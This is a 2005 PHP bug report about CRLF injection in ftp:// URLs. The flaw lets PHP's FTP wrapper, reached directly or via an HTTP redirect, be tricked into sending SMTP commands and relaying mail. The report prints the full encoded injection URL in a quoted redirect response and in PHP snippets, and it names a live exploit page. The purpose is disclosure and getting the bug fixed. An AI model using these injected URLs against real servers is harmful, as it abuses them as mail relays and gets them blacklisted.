ID: 32936 User updated by: herbert dot groot dot jebbink at gmail dot com Reported By: herbert dot groot dot jebbink at gmail dot com Status: Closed Bug Type: FTP related Operating System: Linux PHP Version: 5.0.4 Assigned To: pollita New Comment:
Thanks for the patch, however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked to send a mail. $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A&lt;&gt;%0D%0ARCPT%20TO%3A&lt;listme%40listme.dsbl.org&gt;%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/'; $check = file_get_contents($ftp); Previous Comments: ------------------------------------------------------------------------ [2005-05-06 04:24:29] [EMAIL PROTECTED] This bug has been fixed in CVS. Snapshots of the sources are packaged every three hours; this change will be in the next snapshot. You can grab the snapshot at http://snaps.php.net/. Thank you for the report, and for helping us make PHP better. ------------------------------------------------------------------------ [2005-05-05 12:18:16] herbert dot groot dot jebbink at gmail dot com "Interresting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails where rejected by many mailservers. My bot that is written in PHP was trapped in the given exploit. ------------------------------------------------------------------------ [2005-05-05 04:42:41] [EMAIL PROTECTED] Interresting... ------------------------------------------------------------------------ [2005-05-04 00:33:27] herbert dot groot dot jebbink at gmail dot com Description: ------------ See http://dsbl.org/relay-methods#FTPURL for more details. A exploit can be found at http://dividedsky.net/gfx/badges This URL gives the next result. HTTP/1.x 302 Found Date: Tue, 03 May 2005 21:43:41 GMT Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10 Content-Location: badges.php Vary: negotiate TCN: choice X-Powered-By: PHP/4.3.10-10 Location: ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:[EMAIL PROTECTED]:25/ Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1 Reproduce code: --------------- <?php // DO NOT RUN THIS CODE // YOUR SERVER WILL BE LISTED ON DSBL.ORG // RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS $check = getimagesize('http://dividedsky.net/gfx/badges') ; ?> ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=32936&edit=1
